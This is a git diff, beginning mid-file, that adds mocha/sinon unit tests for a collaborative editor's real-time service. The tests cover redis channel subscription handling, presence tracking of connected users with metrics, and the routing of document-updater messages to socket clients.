+          .rejects(new Error('some redis error'))
+          .onSecondCall()
+          .resolves()
+        this.first = this.ChannelManager.subscribe(
+          this.rclient,
+          'applied-ops',
+          '1234567890abcdef'
+        )
+        // ignore error
+        this.first.catch(() => {})
+        expect(
+          this.ChannelManager.getClientMapEntry(this.rclient).get(
+            'applied-ops:1234567890abcdef'
+          )
+        ).to.equal(this.first)
+
+        this.rclient.unsubscribe = sinon.stub().resolves()
+        this.ChannelManager.unsubscribe(
+          this.rclient,
+          'applied-ops',
+          '1234567890abcdef'
+        )
+        this.second = this.ChannelManager.subscribe(
+          this.rclient,
+          'applied-ops',
+          '1234567890abcdef'
+        )
+        // should get replaced immediately
+        expect(
+          this.ChannelManager.getClientMapEntry(this.rclient).get(
+            'applied-ops:1234567890abcdef'
+          )
+        ).to.equal(this.second)
+
+        // let the first subscribe error -> unsubscribe -> subscribe
+        return setTimeout(done)
+      })
+
+      return it('should cleanup the second subscribePromise', function () {
+        return expect(
+          this.ChannelManager.getClientMapEntry(this.rclient).has(
+            'applied-ops:1234567890abcdef'
+          )
+        ).to.equal(false)
+      })
+    })
+
+    return describe('when there is an existing subscription for another redis client but not this one', function () {
+      beforeEach(function (done) {
+        this.other_rclient.subscribe = sinon.stub().resolves()
+        this.ChannelManager.subscribe(
+          this.other_rclient,
+          'applied-ops',
+          '1234567890abcdef'
+        )
+        this.rclient.subscribe = sinon.stub().resolves() // discard the original stub
+        this.ChannelManager.subscribe(
+          this.rclient,
+          'applied-ops',
+          '1234567890abcdef'
+        )
+        return setTimeout(done)
+      })
+
+      return it('should subscribe to the redis channel on this redis client', function () {
+        return this.rclient.subscribe
+          .calledWithExactly('applied-ops:1234567890abcdef')
+          .should.equal(true)
+      })
+    })
+  })
+
+  describe('unsubscribe', function () {
+    describe('when there is no existing subscription for this redis client', function () {
+      beforeEach(function (done) {
+        this.rclient.unsubscribe = sinon.stub().resolves()
+        this.ChannelManager.unsubscribe(
+          this.rclient,
+          'applied-ops',
+          '1234567890abcdef'
+        )
+        return setTimeout(done)
+      })
+
+      return it('should unsubscribe from the redis channel', function () {
+        return this.rclient.unsubscribe.called.should.equal(true)
+      })
+    })
+
+    describe('when there is an existing subscription for another redis client but not this one', function () {
+      beforeEach(function (done) {
+        this.other_rclient.subscribe = sinon.stub().resolves()
+        this.rclient.unsubscribe = sinon.stub().resolves()
+        this.ChannelManager.subscribe(
+          this.other_rclient,
+          'applied-ops',
+          '1234567890abcdef'
+        )
+        this.ChannelManager.unsubscribe(
+          this.rclient,
+          'applied-ops',
+          '1234567890abcdef'
+        )
+        return setTimeout(done)
+      })
+
+      return it('should still unsubscribe from the redis channel on this client', function () {
+        return this.rclient.unsubscribe.called.should.equal(true)
+      })
+    })
+
+    describe('when unsubscribe errors and completes', function () {
+      beforeEach(function (done) {
+        this.rclient.subscribe = sinon.stub().resolves()
+        this.ChannelManager.subscribe(
+          this.rclient,
+          'applied-ops',
+          '1234567890abcdef'
+        )
+        this.rclient.unsubscribe = sinon
+          .stub()
+          .rejects(new Error('some redis error'))
+        this.ChannelManager.unsubscribe(
+          this.rclient,
+          'applied-ops',
+          '1234567890abcdef'
+        )
+        setTimeout(done)
+        return null
+      })
+
+      it('should have cleaned up', function () {
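+        // Note: the `has(...)` checks in this suite assume bookkeeping in
+        // ChannelManager along these lines (a sketch inferred from the
+        // tests; only getClientMapEntry is a name the tests actually use):
+        //
+        //   const clientChannelMap = new Map() // rclient -> Map<channel:id, Promise>
+        //   function getClientMapEntry(rclient) {
+        //     if (!clientChannelMap.has(rclient)) {
+        //       clientChannelMap.set(rclient, new Map())
+        //     }
+        //     return clientChannelMap.get(rclient)
+        //   }
+        //
+        // A settled subscribe/unsubscribe promise removes its own map entry,
+        // so even a failed unsubscribe leaves the map clean for a retry.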
+        return this.ChannelManager.getClientMapEntry(this.rclient)
+          .has('applied-ops:1234567890abcdef')
+          .should.equal(false)
+      })
+
+      return it('should not error out when subscribing again', function (done) {
+        const p = this.ChannelManager.subscribe(
+          this.rclient,
+          'applied-ops',
+          '1234567890abcdef'
+        )
+        p.then(() => done()).catch(done)
+        return null
+      })
+    })
+
+    describe('when unsubscribe errors and another client subscribes at the same time', function () {
+      beforeEach(function (done) {
+        this.rclient.subscribe = sinon.stub().resolves()
+        this.ChannelManager.subscribe(
+          this.rclient,
+          'applied-ops',
+          '1234567890abcdef'
+        )
+        let rejectSubscribe
+        this.rclient.unsubscribe = () =>
+          new Promise((resolve, reject) => (rejectSubscribe = reject))
+        this.ChannelManager.unsubscribe(
+          this.rclient,
+          'applied-ops',
+          '1234567890abcdef'
+        )
+
+        setTimeout(() => {
+          // delay, actualUnsubscribe should not see the new subscribe request
+          this.ChannelManager.subscribe(
+            this.rclient,
+            'applied-ops',
+            '1234567890abcdef'
+          )
+            .then(() => setTimeout(done))
+            .catch(done)
+          return setTimeout(() =>
+            // delay, rejectSubscribe is not defined immediately
+            rejectSubscribe(new Error('redis error'))
+          )
+        })
+        return null
+      })
+
+      it('should have recorded the error', function () {
+        return expect(
+          this.metrics.inc.calledWithExactly('unsubscribe.failed.applied-ops')
+        ).to.equal(true)
+      })
+
+      it('should have subscribed', function () {
+        return this.rclient.subscribe.called.should.equal(true)
+      })
+
+      return it('should have discarded the finished Promise', function () {
+        return this.ChannelManager.getClientMapEntry(this.rclient)
+          .has('applied-ops:1234567890abcdef')
+          .should.equal(false)
+      })
+    })
+
+    return describe('when there is an existing subscription for this redis client', function () {
+      beforeEach(function (done) {
+        this.rclient.subscribe = sinon.stub().resolves()
+        this.rclient.unsubscribe = sinon.stub().resolves()
+        this.ChannelManager.subscribe(
+          this.rclient,
+          'applied-ops',
+          '1234567890abcdef'
+        )
+        this.ChannelManager.unsubscribe(
+          this.rclient,
+          'applied-ops',
+          '1234567890abcdef'
+        )
+        return setTimeout(done)
+      })
+
+      return it('should unsubscribe from the redis channel', function () {
+        return this.rclient.unsubscribe
+          .calledWithExactly('applied-ops:1234567890abcdef')
+          .should.equal(true)
+      })
+    })
+  })
+
+  return describe('publish', function () {
+    describe("when the channel is 'all'", function () {
+      beforeEach(function () {
+        this.rclient.publish = sinon.stub()
+        return this.ChannelManager.publish(
+          this.rclient,
+          'applied-ops',
+          'all',
+          'random-message'
+        )
+      })
+
+      return it('should publish on the base channel', function () {
+        return this.rclient.publish
+          .calledWithExactly('applied-ops', 'random-message')
+          .should.equal(true)
+      })
+    })
+
+    describe('when the channel has a specific id', function () {
+      describe('when the individual channel setting is false', function () {
+        beforeEach(function () {
+          this.rclient.publish = sinon.stub()
+          this.settings.publishOnIndividualChannels = false
+          return this.ChannelManager.publish(
+            this.rclient,
+            'applied-ops',
+            '1234567890abcdef',
+            'random-message'
+          )
+        })
+
+        return it('should publish on the base channel', function () {
+          this.rclient.publish
+            .calledWithExactly('applied-ops', 'random-message')
+            .should.equal(true)
+          return this.rclient.publish.calledOnce.should.equal(true)
+        })
+      })
+
+      return describe('when the individual channel setting is true', function () {
+        beforeEach(function () {
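+          // Note: together with the 'all' and setting-is-false cases above,
+          // this pins down the channel-name rule; a minimal sketch of it
+          // (illustrative helper, not the actual module code):
+          //
+          //   function channelName(baseChannel, id, settings) {
+          //     if (id === 'all' || !settings.publishOnIndividualChannels) {
+          //       return baseChannel // e.g. 'applied-ops'
+          //     }
+          //     return `${baseChannel}:${id}` // e.g. 'applied-ops:1234567890abcdef'
+          //   }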
this.rclient.publish = sinon.stub() + this.settings.publishOnIndividualChannels = true + return this.ChannelManager.publish( + this.rclient, + 'applied-ops', + '1234567890abcdef', + 'random-message' + ) + }) + + return it('should publish on the per-id channel', function () { + this.rclient.publish + .calledWithExactly('applied-ops:1234567890abcdef', 'random-message') + .should.equal(true) + return this.rclient.publish.calledOnce.should.equal(true) + }) + }) + }) + + return describe('metrics', function () { + beforeEach(function () { + this.rclient.publish = sinon.stub() + return this.ChannelManager.publish( + this.rclient, + 'applied-ops', + 'all', + 'random-message' + ) + }) + + return it('should track the payload size', function () { + return this.metrics.summary + .calledWithExactly( + 'redis.publish.applied-ops', + 'random-message'.length + ) + .should.equal(true) + }) + }) + }) +}) diff --git a/services/real-time/test/unit/js/ConnectedUsersManagerTests.js b/services/real-time/test/unit/js/ConnectedUsersManagerTests.js new file mode 100644 index 0000000..a686407 --- /dev/null +++ b/services/real-time/test/unit/js/ConnectedUsersManagerTests.js @@ -0,0 +1,648 @@ +/* eslint-disable + no-return-assign, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ + +const SandboxedModule = require('sandboxed-module') +const assert = require('node:assert') +const path = require('node:path') +const sinon = require('sinon') +const modulePath = path.join(__dirname, '../../../app/js/ConnectedUsersManager') +const { expect } = require('chai') +const tk = require('timekeeper') + +describe('ConnectedUsersManager', function () { + beforeEach(function () { + tk.freeze(new Date()) + this.settings = { + redis: { + realtime: { + key_schema: { + clientsInProject({ project_id: projectId }) { + return `clients_in_project:${projectId}` + }, + connectedUser({ project_id: projectId, client_id: clientId }) { + return `connected_user:${projectId}:${clientId}` + }, + projectNotEmptySince({ projectId }) { + return `projectNotEmptySince:{${projectId}}` + }, + }, + }, + }, + } + this.rClient = { + auth() {}, + getdel: sinon.stub(), + scard: sinon.stub(), + set: sinon.stub(), + setex: sinon.stub(), + sadd: sinon.stub(), + get: sinon.stub(), + srem: sinon.stub(), + del: sinon.stub(), + smembers: sinon.stub(), + expire: sinon.stub(), + hset: sinon.stub(), + hgetall: sinon.stub(), + exec: sinon.stub(), + multi: () => { + return this.rClient + }, + } + this.Metrics = { + inc: sinon.stub(), + histogram: sinon.stub(), + } + + this.ConnectedUsersManager = SandboxedModule.require(modulePath, { + requires: { + '@overleaf/settings': this.settings, + '@overleaf/metrics': this.Metrics, + '@overleaf/redis-wrapper': { + createClient: () => { + return this.rClient + }, + }, + }, + }) + this.client_id = '32132132' + this.project_id = 'dskjh2u21321' + this.user = { + _id: 'user-id-123', + first_name: 'Joe', + last_name: 'Bloggs', + email: 'joe@example.com', + } + return (this.cursorData = { + row: 12, + column: 9, + doc_id: '53c3b8c85fee64000023dc6e', + }) + }) + + afterEach(function () { + return tk.reset() + }) + + describe('updateUserPosition', function () { + beforeEach(function () { + this.rClient.exec.yields(null, [1, 1]) + }) + + it('should set a key with the date and 
give it a ttl', function (done) { + return this.ConnectedUsersManager.updateUserPosition( + this.project_id, + this.client_id, + this.user, + null, + err => { + if (err) return done(err) + this.rClient.hset + .calledWith( + `connected_user:${this.project_id}:${this.client_id}`, + 'last_updated_at', + Date.now() + ) + .should.equal(true) + return done() + } + ) + }) + + it('should set a key with the user_id', function (done) { + return this.ConnectedUsersManager.updateUserPosition( + this.project_id, + this.client_id, + this.user, + null, + err => { + if (err) return done(err) + this.rClient.hset + .calledWith( + `connected_user:${this.project_id}:${this.client_id}`, + 'user_id', + this.user._id + ) + .should.equal(true) + return done() + } + ) + }) + + it('should set a key with the first_name', function (done) { + return this.ConnectedUsersManager.updateUserPosition( + this.project_id, + this.client_id, + this.user, + null, + err => { + if (err) return done(err) + this.rClient.hset + .calledWith( + `connected_user:${this.project_id}:${this.client_id}`, + 'first_name', + this.user.first_name + ) + .should.equal(true) + return done() + } + ) + }) + + it('should set a key with the last_name', function (done) { + return this.ConnectedUsersManager.updateUserPosition( + this.project_id, + this.client_id, + this.user, + null, + err => { + if (err) return done(err) + this.rClient.hset + .calledWith( + `connected_user:${this.project_id}:${this.client_id}`, + 'last_name', + this.user.last_name + ) + .should.equal(true) + return done() + } + ) + }) + + it('should set a key with the email', function (done) { + return this.ConnectedUsersManager.updateUserPosition( + this.project_id, + this.client_id, + this.user, + null, + err => { + if (err) return done(err) + this.rClient.hset + .calledWith( + `connected_user:${this.project_id}:${this.client_id}`, + 'email', + this.user.email + ) + .should.equal(true) + return done() + } + ) + }) + + it('should push the client_id on to the project list', function (done) { + return this.ConnectedUsersManager.updateUserPosition( + this.project_id, + this.client_id, + this.user, + null, + err => { + if (err) return done(err) + this.rClient.sadd + .calledWith(`clients_in_project:${this.project_id}`, this.client_id) + .should.equal(true) + return done() + } + ) + }) + + it('should add a ttl to the project set so it stays clean', function (done) { + return this.ConnectedUsersManager.updateUserPosition( + this.project_id, + this.client_id, + this.user, + null, + err => { + if (err) return done(err) + this.rClient.expire + .calledWith( + `clients_in_project:${this.project_id}`, + 24 * 4 * 60 * 60 + ) + .should.equal(true) + return done() + } + ) + }) + + it('should add a ttl to the connected user so it stays clean', function (done) { + return this.ConnectedUsersManager.updateUserPosition( + this.project_id, + this.client_id, + this.user, + null, + err => { + if (err) return done(err) + this.rClient.expire + .calledWith( + `connected_user:${this.project_id}:${this.client_id}`, + 60 * 15 + ) + .should.equal(true) + return done() + } + ) + }) + + it('should set the cursor position when provided', function (done) { + return this.ConnectedUsersManager.updateUserPosition( + this.project_id, + this.client_id, + this.user, + this.cursorData, + err => { + if (err) return done(err) + this.rClient.hset + .calledWith( + `connected_user:${this.project_id}:${this.client_id}`, + 'cursorData', + JSON.stringify(this.cursorData) + ) + .should.equal(true) + return done() + } + ) + }) + + 
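+    // Note: taken together, the assertions above imply one multi/exec per
+    // updateUserPosition call, roughly as sketched below (key names come
+    // from the stubbed key_schema in this file; the exact call order is an
+    // assumption):
+    //
+    //   const multi = rClient.multi()
+    //   multi.sadd(`clients_in_project:${projectId}`, clientId)
+    //   multi.expire(`clients_in_project:${projectId}`, 4 * 24 * 60 * 60)
+    //   multi.hset(`connected_user:${projectId}:${clientId}`, fields) // user + last_updated_at
+    //   if (cursorData) multi.hset(key, 'cursorData', JSON.stringify(cursorData))
+    //   multi.expire(`connected_user:${projectId}:${clientId}`, 15 * 60)
+    //   multi.exec(callback) // second reply presumably = clients now in the project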
describe('editing_session_mode', function () { + const cases = { + 'should bump the metric when connecting to empty room': { + nConnectedClients: 1, + cursorData: null, + labels: { + method: 'connect', + status: 'single', + }, + }, + 'should bump the metric when connecting to non-empty room': { + nConnectedClients: 2, + cursorData: null, + labels: { + method: 'connect', + status: 'multi', + }, + }, + 'should bump the metric when updating in empty room': { + nConnectedClients: 1, + cursorData: { row: 42 }, + labels: { + method: 'update', + status: 'single', + }, + }, + 'should bump the metric when updating in non-empty room': { + nConnectedClients: 2, + cursorData: { row: 42 }, + labels: { + method: 'update', + status: 'multi', + }, + }, + } + + for (const [ + name, + { nConnectedClients, cursorData, labels }, + ] of Object.entries(cases)) { + it(name, function (done) { + this.rClient.exec.yields(null, [1, nConnectedClients]) + this.ConnectedUsersManager.updateUserPosition( + this.project_id, + this.client_id, + this.user, + cursorData, + err => { + if (err) return done(err) + expect(this.Metrics.inc).to.have.been.calledWith( + 'editing_session_mode', + 1, + labels + ) + done() + } + ) + }) + } + }) + }) + + describe('markUserAsDisconnected', function () { + beforeEach(function () { + this.rClient.exec.yields(null, [1, 0]) + }) + + it('should remove the user from the set', function (done) { + return this.ConnectedUsersManager.markUserAsDisconnected( + this.project_id, + this.client_id, + err => { + if (err) return done(err) + this.rClient.srem + .calledWith(`clients_in_project:${this.project_id}`, this.client_id) + .should.equal(true) + return done() + } + ) + }) + + it('should delete the connected_user string', function (done) { + return this.ConnectedUsersManager.markUserAsDisconnected( + this.project_id, + this.client_id, + err => { + if (err) return done(err) + this.rClient.del + .calledWith(`connected_user:${this.project_id}:${this.client_id}`) + .should.equal(true) + return done() + } + ) + }) + + it('should add a ttl to the connected user set so it stays clean', function (done) { + return this.ConnectedUsersManager.markUserAsDisconnected( + this.project_id, + this.client_id, + err => { + if (err) return done(err) + this.rClient.expire + .calledWith( + `clients_in_project:${this.project_id}`, + 24 * 4 * 60 * 60 + ) + .should.equal(true) + return done() + } + ) + }) + + describe('editing_session_mode', function () { + const cases = { + 'should bump the metric when disconnecting from now empty room': { + nConnectedClients: 0, + labels: { + method: 'disconnect', + status: 'empty', + }, + }, + 'should bump the metric when disconnecting from now single room': { + nConnectedClients: 1, + labels: { + method: 'disconnect', + status: 'single', + }, + }, + 'should bump the metric when disconnecting from now multi room': { + nConnectedClients: 2, + labels: { + method: 'disconnect', + status: 'multi', + }, + }, + } + + for (const [name, { nConnectedClients, labels }] of Object.entries( + cases + )) { + it(name, function (done) { + this.rClient.exec.yields(null, [1, nConnectedClients]) + this.ConnectedUsersManager.markUserAsDisconnected( + this.project_id, + this.client_id, + err => { + if (err) return done(err) + expect(this.Metrics.inc).to.have.been.calledWith( + 'editing_session_mode', + 1, + labels + ) + done() + } + ) + }) + } + }) + + describe('projectNotEmptySince', function () { + it('should clear the projectNotEmptySince key when empty and skip metric if not set', function (done) { + 
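+        // Note: the cases in this describe suggest the following disconnect
+        // flow for the projectNotEmptySince marker (a sketch; helper names
+        // are hypothetical, timings follow the tk.freeze values below):
+        //
+        //   if (remainingClients === 0) {
+        //     // room is now empty: clear the marker and, if it had been
+        //     // set, report how long the project stayed non-empty
+        //     rClient.getdel(key, (err, since) => {
+        //       if (since) histogram(nowSeconds - Number(since), { status: 'empty' })
+        //     })
+        //   } else {
+        //     // clients remain: record the first-seen timestamp once (NX),
+        //     // rounded up to whole seconds, with a 31-day expiry
+        //     rClient.set(key, ceil(nowSeconds), 'NX', 'EX', 31 * 24 * 60 * 60)
+        //   }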
this.rClient.exec.yields(null, [1, 0]) + this.rClient.getdel.yields(null, '') + this.ConnectedUsersManager.markUserAsDisconnected( + this.project_id, + this.client_id, + err => { + if (err) return done(err) + expect(this.rClient.getdel).to.have.been.calledWith( + `projectNotEmptySince:{${this.project_id}}` + ) + expect(this.Metrics.histogram).to.not.have.been.called + done() + } + ) + }) + it('should clear the projectNotEmptySince key when empty and record metric if set', function (done) { + this.rClient.exec.onFirstCall().yields(null, [1, 0]) + tk.freeze(1_234_000) + this.rClient.getdel.yields(null, '1230') + this.ConnectedUsersManager.markUserAsDisconnected( + this.project_id, + this.client_id, + err => { + if (err) return done(err) + expect(this.rClient.getdel).to.have.been.calledWith( + `projectNotEmptySince:{${this.project_id}}` + ) + expect(this.Metrics.histogram).to.have.been.calledWith( + 'project_not_empty_since', + 4, + sinon.match.any, + { status: 'empty' } + ) + done() + } + ) + }) + it('should set projectNotEmptySince key when single and skip metric if not set before', function (done) { + this.rClient.exec.onFirstCall().yields(null, [1, 1]) + tk.freeze(1_233_001) // should ceil up + this.rClient.exec.onSecondCall().yields(null, ['']) + this.ConnectedUsersManager.markUserAsDisconnected( + this.project_id, + this.client_id, + err => { + if (err) return done(err) + expect(this.rClient.set).to.have.been.calledWith( + `projectNotEmptySince:{${this.project_id}}`, + '1234', + 'NX', + 'EX', + 31 * 24 * 60 * 60 + ) + expect(this.Metrics.histogram).to.not.have.been.called + done() + } + ) + }) + const cases = { + 'should set projectNotEmptySince key when single and record metric if set before': + { + nConnectedClients: 1, + labels: { + status: 'single', + }, + }, + 'should set projectNotEmptySince key when multi and record metric if set before': + { + nConnectedClients: 2, + labels: { + status: 'multi', + }, + }, + } + for (const [name, { nConnectedClients, labels }] of Object.entries( + cases + )) { + it(name, function (done) { + this.rClient.exec.onFirstCall().yields(null, [1, nConnectedClients]) + tk.freeze(1_235_000) + this.rClient.exec.onSecondCall().yields(null, ['1230']) + this.ConnectedUsersManager.markUserAsDisconnected( + this.project_id, + this.client_id, + err => { + if (err) return done(err) + expect(this.rClient.set).to.have.been.calledWith( + `projectNotEmptySince:{${this.project_id}}`, + '1235', + 'NX', + 'EX', + 31 * 24 * 60 * 60 + ) + expect(this.Metrics.histogram).to.have.been.calledWith( + 'project_not_empty_since', + 5, + sinon.match.any, + labels + ) + done() + } + ) + }) + } + }) + }) + + describe('_getConnectedUser', function () { + it('should return a connected user if there is a user object', function (done) { + const cursorData = JSON.stringify({ cursorData: { row: 1 } }) + this.rClient.hgetall.callsArgWith(1, null, { + connected_at: new Date(), + user_id: this.user._id, + last_updated_at: `${Date.now()}`, + cursorData, + }) + return this.ConnectedUsersManager._getConnectedUser( + this.project_id, + this.client_id, + (err, result) => { + if (err) return done(err) + result.connected.should.equal(true) + result.client_id.should.equal(this.client_id) + return done() + } + ) + }) + + it('should return a not connected user if there is no object', function (done) { + this.rClient.hgetall.callsArgWith(1, null, null) + return this.ConnectedUsersManager._getConnectedUser( + this.project_id, + this.client_id, + (err, result) => { + if (err) return done(err) + 
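+          // (shape note: per this and the sibling tests, _getConnectedUser
+          // presumably maps the redis hash to { client_id, connected, ... },
+          // reporting connected: false for a missing or empty hash)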
result.connected.should.equal(false) + result.client_id.should.equal(this.client_id) + return done() + } + ) + }) + + return it('should return a not connected user if there is an empty object', function (done) { + this.rClient.hgetall.callsArgWith(1, null, {}) + return this.ConnectedUsersManager._getConnectedUser( + this.project_id, + this.client_id, + (err, result) => { + if (err) return done(err) + result.connected.should.equal(false) + result.client_id.should.equal(this.client_id) + return done() + } + ) + }) + }) + + return describe('getConnectedUsers', function () { + beforeEach(function () { + this.users = ['1234', '5678', '9123', '8234'] + this.rClient.smembers.callsArgWith(1, null, this.users) + this.ConnectedUsersManager._getConnectedUser = sinon.stub() + this.ConnectedUsersManager._getConnectedUser + .withArgs(this.project_id, this.users[0]) + .callsArgWith(2, null, { + connected: true, + client_age: 2, + client_id: this.users[0], + }) + this.ConnectedUsersManager._getConnectedUser + .withArgs(this.project_id, this.users[1]) + .callsArgWith(2, null, { + connected: false, + client_age: 1, + client_id: this.users[1], + }) + this.ConnectedUsersManager._getConnectedUser + .withArgs(this.project_id, this.users[2]) + .callsArgWith(2, null, { + connected: true, + client_age: 3, + client_id: this.users[2], + }) + return this.ConnectedUsersManager._getConnectedUser + .withArgs(this.project_id, this.users[3]) + .callsArgWith(2, null, { + connected: true, + client_age: 11, + client_id: this.users[3], + }) + }) // connected but old + + return it('should only return the users in the list which are still in redis and recently updated', function (done) { + return this.ConnectedUsersManager.getConnectedUsers( + this.project_id, + (err, users) => { + if (err) return done(err) + users.length.should.equal(2) + users[0].should.deep.equal({ + client_id: this.users[0], + client_age: 2, + connected: true, + }) + users[1].should.deep.equal({ + client_id: this.users[2], + client_age: 3, + connected: true, + }) + return done() + } + ) + }) + }) +}) diff --git a/services/real-time/test/unit/js/DocumentUpdaterControllerTests.js b/services/real-time/test/unit/js/DocumentUpdaterControllerTests.js new file mode 100644 index 0000000..dd34c62 --- /dev/null +++ b/services/real-time/test/unit/js/DocumentUpdaterControllerTests.js @@ -0,0 +1,259 @@ +/* eslint-disable + no-return-assign, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. 
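+// Note: read together, the tests below assume DocumentUpdaterController
+// wires redis pub/sub to socket.io roughly as sketched here (names are the
+// ones stubbed in this file, not checked against the module source):
+//
+//   for (const rclient of rclientList) {
+//     rclient.subscribe('applied-ops')
+//     rclient.on('message', (channel, blob) =>
+//       SafeJsonParse.parse(blob, (err, msg) => {
+//         if (err) return logger.error({ err }, 'invalid JSON')
+//         if (msg.error) return disconnectDocClients(io, msg.doc_id) // + warn
+//         // version bump to the source client, full op to the others
+//         applyUpdate(io, msg.doc_id, msg.op)
+//       })
+//     )
+//   }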
+/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const SandboxedModule = require('sandboxed-module') +const sinon = require('sinon') +const modulePath = require('node:path').join( + __dirname, + '../../../app/js/DocumentUpdaterController' +) +const MockClient = require('./helpers/MockClient') + +describe('DocumentUpdaterController', function () { + beforeEach(function () { + this.project_id = 'project-id-123' + this.doc_id = 'doc-id-123' + this.callback = sinon.stub() + this.io = { mock: 'socket.io' } + this.rclient = [] + this.RoomEvents = { on: sinon.stub() } + this.EditorUpdatesController = SandboxedModule.require(modulePath, { + requires: { + '@overleaf/settings': (this.settings = { + redis: { + documentupdater: { + key_schema: { + pendingUpdates({ doc_id: docId }) { + return `PendingUpdates:${docId}` + }, + }, + }, + pubsub: null, + }, + }), + './RedisClientManager': { + createClientList: () => { + this.redis = { + createClient: name => { + let rclientStub + this.rclient.push((rclientStub = { name })) + return rclientStub + }, + } + }, + }, + './SafeJsonParse': (this.SafeJsonParse = { + parse: (data, cb) => cb(null, JSON.parse(data)), + }), + './EventLogger': (this.EventLogger = { checkEventOrder: sinon.stub() }), + './HealthCheckManager': { check: sinon.stub() }, + '@overleaf/metrics': (this.metrics = { + inc: sinon.stub(), + histogram: sinon.stub(), + }), + './RoomManager': (this.RoomManager = { + eventSource: sinon.stub().returns(this.RoomEvents), + }), + './ChannelManager': (this.ChannelManager = {}), + }, + }) + }) + + describe('listenForUpdatesFromDocumentUpdater', function () { + beforeEach(function () { + this.rclient.length = 0 // clear any existing clients + this.EditorUpdatesController.rclientList = [ + this.redis.createClient('first'), + this.redis.createClient('second'), + ] + this.rclient[0].subscribe = sinon.stub() + this.rclient[0].on = sinon.stub() + this.rclient[1].subscribe = sinon.stub() + this.rclient[1].on = sinon.stub() + this.EditorUpdatesController.listenForUpdatesFromDocumentUpdater() + }) + + it('should subscribe to the doc-updater stream', function () { + this.rclient[0].subscribe.calledWith('applied-ops').should.equal(true) + }) + + it('should register a callback to handle updates', function () { + this.rclient[0].on.calledWith('message').should.equal(true) + }) + + it('should subscribe to any additional doc-updater stream', function () { + this.rclient[1].subscribe.calledWith('applied-ops').should.equal(true) + this.rclient[1].on.calledWith('message').should.equal(true) + }) + }) + + describe('_processMessageFromDocumentUpdater', function () { + describe('with bad JSON', function () { + beforeEach(function () { + this.SafeJsonParse.parse = sinon + .stub() + .callsArgWith(1, new Error('oops')) + return this.EditorUpdatesController._processMessageFromDocumentUpdater( + this.io, + 'applied-ops', + 'blah' + ) + }) + + it('should log an error', function () { + return this.logger.error.called.should.equal(true) + }) + }) + + describe('with update', function () { + beforeEach(function () { + this.message = { + doc_id: this.doc_id, + op: { t: 'foo', p: 12 }, + } + this.EditorUpdatesController._applyUpdateFromDocumentUpdater = + sinon.stub() + return this.EditorUpdatesController._processMessageFromDocumentUpdater( + this.io, + 'applied-ops', + 
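+        // (payload note: the applied-ops wire format exercised in these
+        // describes is a JSON blob carrying doc_id plus either `op` or
+        // `error` -- see the sibling "with error" case)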
JSON.stringify(this.message) + ) + }) + + it('should apply the update', function () { + return this.EditorUpdatesController._applyUpdateFromDocumentUpdater + .calledWith(this.io, this.doc_id, this.message.op) + .should.equal(true) + }) + }) + + describe('with error', function () { + beforeEach(function () { + this.message = { + doc_id: this.doc_id, + error: 'Something went wrong', + } + this.EditorUpdatesController._processErrorFromDocumentUpdater = + sinon.stub() + return this.EditorUpdatesController._processMessageFromDocumentUpdater( + this.io, + 'applied-ops', + JSON.stringify(this.message) + ) + }) + + return it('should process the error', function () { + return this.EditorUpdatesController._processErrorFromDocumentUpdater + .calledWith(this.io, this.doc_id, this.message.error) + .should.equal(true) + }) + }) + }) + + describe('_applyUpdateFromDocumentUpdater', function () { + beforeEach(function () { + this.sourceClient = new MockClient() + this.otherClients = [new MockClient(), new MockClient()] + this.update = { + op: [{ t: 'foo', p: 12 }], + meta: { source: this.sourceClient.publicId }, + v: (this.version = 42), + doc: this.doc_id, + } + return (this.io.sockets = { + clients: sinon + .stub() + .returns([ + this.sourceClient, + ...Array.from(this.otherClients), + this.sourceClient, + ]), + }) + }) // include a duplicate client + + describe('normally', function () { + beforeEach(function () { + return this.EditorUpdatesController._applyUpdateFromDocumentUpdater( + this.io, + this.doc_id, + this.update + ) + }) + + it('should send a version bump to the source client', function () { + this.sourceClient.emit + .calledWith('otUpdateApplied', { v: this.version, doc: this.doc_id }) + .should.equal(true) + return this.sourceClient.emit.calledOnce.should.equal(true) + }) + + it('should get the clients connected to the document', function () { + return this.io.sockets.clients + .calledWith(this.doc_id) + .should.equal(true) + }) + + return it('should send the full update to the other clients', function () { + return Array.from(this.otherClients).map(client => + client.emit + .calledWith('otUpdateApplied', this.update) + .should.equal(true) + ) + }) + }) + + return describe('with a duplicate op', function () { + beforeEach(function () { + this.update.dup = true + return this.EditorUpdatesController._applyUpdateFromDocumentUpdater( + this.io, + this.doc_id, + this.update + ) + }) + + it('should send a version bump to the source client as usual', function () { + return this.sourceClient.emit + .calledWith('otUpdateApplied', { v: this.version, doc: this.doc_id }) + .should.equal(true) + }) + + return it("should not send anything to the other clients (they've already had the op)", function () { + return Array.from(this.otherClients).map(client => + client.emit.calledWith('otUpdateApplied').should.equal(false) + ) + }) + }) + }) + + return describe('_processErrorFromDocumentUpdater', function () { + beforeEach(function () { + this.clients = [new MockClient(), new MockClient()] + this.io.sockets = { clients: sinon.stub().returns(this.clients) } + return this.EditorUpdatesController._processErrorFromDocumentUpdater( + this.io, + this.doc_id, + 'Something went wrong' + ) + }) + + it('should log a warning', function () { + return this.logger.warn.called.should.equal(true) + }) + + return it('should disconnect all clients in that document', function () { + this.io.sockets.clients.calledWith(this.doc_id).should.equal(true) + return Array.from(this.clients).map(client => + 
